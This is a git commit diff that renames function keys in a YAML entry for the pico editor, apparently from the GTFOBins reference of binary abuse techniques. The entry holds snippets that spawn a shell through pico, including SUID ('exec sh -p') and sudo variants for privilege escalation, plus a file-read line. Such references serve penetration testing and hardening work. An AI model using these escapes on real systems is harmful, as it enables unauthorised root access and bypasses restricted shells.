Adopt new function names

This commit is contained in:
Emilio Pinna
2018-10-05 18:55:38 +01:00
parent 1c77f099d3
commit dd337b5ddf
110 changed files with 354 additions and 354 deletions

View File

@@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: |
TF=$(mktemp)
echo 'exec sh' > $TF
@@ -14,14 +14,14 @@ functions:
^O
file-read:
- code: pico file_to_read
suid-enabled:
suid:
- code: |
TF=$(mktemp)
echo 'exec sh -p' > $TF
chmod +x $TF
./pico -s $TF /etc/hosts
^T
sudo-enabled:
sudo:
- code: |
TF=$(mktemp)
echo 'exec sh' > $TF